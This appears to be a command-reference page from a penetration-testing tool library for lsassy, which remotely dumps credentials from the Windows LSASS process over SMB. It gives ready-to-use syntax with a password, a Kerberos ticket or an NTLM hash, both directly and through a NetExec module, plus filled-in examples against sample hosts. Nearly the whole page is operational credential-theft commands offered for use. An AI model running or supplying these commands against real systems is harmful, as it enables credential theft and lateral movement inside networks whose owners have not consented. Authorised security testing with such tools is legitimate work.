Lsassy LSASS Dump

Remotely dump LSASS credentials using lsassy

Tool
lsassy
Category
Credential Attacks / Hash Dumping
Platform
linux
Requires
password
Protocols
SMB

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

lsassy -u '<user>' -p '<password>' -d '<domain>' -dc-ip <dc_ip> <ip>

Credential variants

The same attack using a different authentication material.

Kerberos Ticket requires Kerberos ticket

lsassy -k --no-pass -d '<domain>' <ip>

NetExec Module requires password

nxc smb '<ip>' -u '<user>' -p '<password>' -M lsassy

NetExec Module (Hash) requires NTLM hash

nxc smb '<ip>' -u '<user>' -H '<hash>' -M lsassy

Examples

lsassy -u 'user' -p 'password' -d 'corp.local' -dc-ip 192.168.1.2 192.168.1.31
lsassy -k --no-pass -d 'corp.local' us-mssql.corp.local
nxc smb '192.168.1.31' -u 'user' -p 'password' -M lsassy

Tags

lsassy lsass credentials dump remote